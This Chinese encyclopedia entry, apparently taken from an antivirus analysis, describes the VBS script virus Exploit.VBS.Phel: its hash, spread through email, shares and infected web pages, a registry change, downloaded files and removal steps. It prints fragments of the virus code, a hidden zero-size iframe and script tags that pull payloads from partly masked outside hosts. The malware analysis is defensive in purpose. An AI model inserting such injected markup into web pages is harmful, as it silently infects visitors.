| 词条 | Exploit.VBS.Phel |
| 释义 | 病毒名称和介绍Exploit.VBS.Phel 文件 MD5: 49B21DC7A8FDEE131119598E37E39DFA 公开范围: 完全公开 危害等级: 中 文件长度: 3,284 字节 感染系统: windows98以上版本 开发工具: VB Script 加壳类型: 无 命名对照: Symentec[无] Mcafee[Exploit-ObscuredHtml] 病毒描述该病毒属VBS脚本病毒,病毒运行后,联接网络,下载病毒文件到系统临时文件夹,修改注册表。该病毒通过mail附件、局域网共享、IRC聊天通道及感染htm、asp、jsp、php等网页文件传播。该病毒对用户有一定危害。 行为分析1、病毒运行后,下载病毒文件到系统临时文件夹: %Documents and Settings%\\用户名\\Local Settings\\Temp\olove.gif %Documents and Settings%\\用户名\\Local Settings\\Temp\\a.asp 2、修改注册表项: HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\ 键值: 字串: "NotifyDownloadComplete "="yes" 3、联接网络: http://www.xuemu****.com/nolove.gif http://www.sin***.com/shin/inc/a.asp 4、该病毒部分代码为: <iframe src="http://www.sin***.com/shin/inc/a.asp"width="0"height="0"> <SCRIPT language=JScriptsrc=\\\\http://www.xuemu****.com/nolove.gif\\\\" ."+String.fromCharCode(62)+\\"> <SCRIPT language=VScript src="nolove.gif"> </SCRIPT><SCRIPTlang uage=VScript src="nolove.pif"> 注:%Documents and Settings%是一个可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。Windows操作系统中默认的安装路径是C:\\ Documents and Settings。 -------------------------------------------------------------------------------- 清除方案1、使用安天木马防线可彻底清除此病毒(推荐)。 2、手工清除请按照行为分析删除对应文件,恢复相关系统设置。 (1) 使用安天木马防线“进程管理”关闭病毒进程 (2) 删除病毒文件 %Documents and Settings%\\用户名 \\Local Settings\\Temp\olove.gif %Documents and Settings%\\用户名 \\Local Settings\\Temp\\a.asp (3) 恢复病毒修改的注册表项目,删除病毒添加的注册表项 http://www.xuemu****.com/nolove.gif http://www.sin***.com/shin/inc/a.asp |
| 随便看 |
百科全书收录4421916条中文百科知识,基本涵盖了大多数领域的百科知识,是一部内容开放、自由的电子版百科全书。